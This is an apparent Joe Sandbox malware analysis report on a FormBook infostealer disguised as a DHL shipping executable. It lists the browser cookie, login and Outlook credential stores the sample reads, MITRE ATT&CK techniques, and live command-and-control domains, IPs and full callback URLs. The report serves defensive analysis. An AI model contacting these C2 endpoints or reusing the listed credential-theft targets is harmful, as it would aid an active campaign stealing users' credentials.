Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: DHL 745-12302024.exe	Binary or memory string: WIN_81
Source: DHL 745-12302024.exe	Binary or memory string: WIN_XP
Source: DHL 745-12302024.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: DHL 745-12302024.exe	Binary or memory string: WIN_XPe
Source: DHL 745-12302024.exe	Binary or memory string: WIN_VISTA
Source: DHL 745-12302024.exe	Binary or memory string: WIN_7
Source: DHL 745-12302024.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00AE1204
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00AE1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL 745-12302024.exe	39%	Virustotal		Browse
DHL 745-12302024.exe	42%	ReversingLabs	Win32.Trojan.Generic
DHL 745-12302024.exe	100%	Avira	DR/AutoIt.Gen8
DHL 745-12302024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.empowermedeco.com/fo8o/?BR14=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&D0=YnO0xF1X40	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?D0=YnO0xF1X40&BR14=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/?BR14=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&D0=YnO0xF1X40	100%	Avira URL Cloud	malware
http://www.3xfootball.com/fo8o/?D0=YnO0xF1X40&BR14=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware
https://www.empowermedeco.com/fo8o/?BR14=mxnR	0%	Avira URL Cloud	safe
http://www.empowermedeco.com	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/?D0=YnO0xF1X40&BR14=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?D0=YnO0xF1X40&BR14=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	high
empowermedeco.com	217.196.55.202	true	false	high
www.3xfootball.com	154.215.72.110	true	true	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	high
www.rssnewscast.com	91.195.240.94	true	true	unknown
www.techchains.info	66.29.149.46	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	false	high
www.660danm.top	unknown	unknown	true	unknown
www.joyesi.xyz	unknown	unknown	false	high
www.liangyuen528.com	unknown	unknown	true	unknown
www.kasegitai.tokyo	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	false	high
www.k9vyp11no3.cfd	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	false	high
www.shenzhoucui.com	unknown	unknown	true	unknown
www.antonio-vivaldi.mobi	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.empowermedeco.com/fo8o/	false		high
http://www.empowermedeco.com/fo8o/?BR14=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&D0=YnO0xF1X40	true	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/?D0=YnO0xF1X40&BR14=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==	true	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/?BR14=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&D0=YnO0xF1X40	true	Avira URL Cloud: malware	unknown
http://www.elettrosistemista.zip/fo8o/	false		high
http://www.magmadokum.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/	false		high
http://www.3xfootball.com/fo8o/?D0=YnO0xF1X40&BR14=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==	true	Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/?D0=YnO0xF1X40&BR14=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==	true	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/?D0=YnO0xF1X40&BR14=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==	true	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/	false		high
http://www.techchains.info/fo8o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?BR14=mxnR	netbtugc.exe, 00000004.00000002.3878368158.0000000004EAA000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.000000000414A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3878718272.00000000050A8000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.3878368158.000000000453E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3880747412.0000000006200000.00000004.00000800.00020000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.00000000037DE000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.00000000037DE000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.3878368158.0000000004862000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000003B02000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.3878368158.0000000004862000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000003B02000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000002.3880859561.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	true
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	true
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582687
Start date and time:	2024-12-31 09:27:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL 745-12302024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@15/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 44 Number of non-executed functions: 308
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:29:11	API Interceptor	10573822x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	236236236.elf	Get hash	malicious	Unknown	Browse	suboyule.736t.com/
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.3xfootball.com	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	Certificate 1045-20-11.exe	Get hash	malicious	FormBook	Browse	154.215.72.110

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	vcimanagement.armv4l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.250.157.117
	vcimanagement.armv6l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.252.64.239
	vcimanagement.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.242.206.56
	vcimanagement.sh4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.253.238.131
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	154.216.83.124
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	154.216.83.138
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	154.218.41.135
	armv4l.elf	Get hash	malicious	Mirai	Browse	154.209.38.58
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	160.124.107.222
REGISTER-ASIT	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	SRT68.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	195.110.124.133
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	101.0.232.112
	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	119.15.228.125
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
SEDO-ASDE	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	236236236.elf	Get hash	malicious	Unknown	Browse	91.195.240.94
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Sancha

Download File

Process:	C:\Users\user\Desktop\DHL 745-12302024.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.988467415034011
Encrypted:	false
SSDEEP:	6144:KomT9hioXI5xf60c63ABuUrTm82Wg56SHs4iGaEejkgnXP:Wbio4fR+uUu82Z6SHHiGQk+/
MD5:	B9F61366CBA662A9324548FD46EEFC5E
SHA1:	51BE51A6092DA2988E467DB8FA6DA91675CEF5A5
SHA-256:	1089846714DD55DCF7CE4786993B58DA0877DC59DE1AF8844A751D34AE927507
SHA-512:	1608755C3969A9227130B2680C73CCDEB3A68006BFB11B33298FD5FD8AB8CDED45678EC4BF5FB89A5891F6A45353EFBAF3E2DE86FD054EC93FD0A28ECBC6722F
Malicious:	false
Reputation:	low
Preview:	.....6DO0j.Z....s.2W...5L..TDSD66DO02TDSD66DO02TDSD66DO02.DSD8).A0.].r.7z.ndZ=7s4DY#=Q_t'2XY0oRWt6&._*ot}.d>+RSjB=8pDSD66DOI3].n$Q.y/W.i$4.,...R3.I..x/W.N....V#.b[7,n$Q.DO02TDSDfsDO\|3UD.,.iDO02TDSD.6FN;3_DST26DO02TDSD.#DO0"TDSd26DOp2TTSD64DO62TDSD66BO02TDSD6.@O00TDSD66FOp.TDCD6&DO02DDST66DO02DDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TD}0SN0O02.KWD6&DO0"PDST66DO02TDSD66DO.2T$SD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02TDSD66DO02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.393355028097161
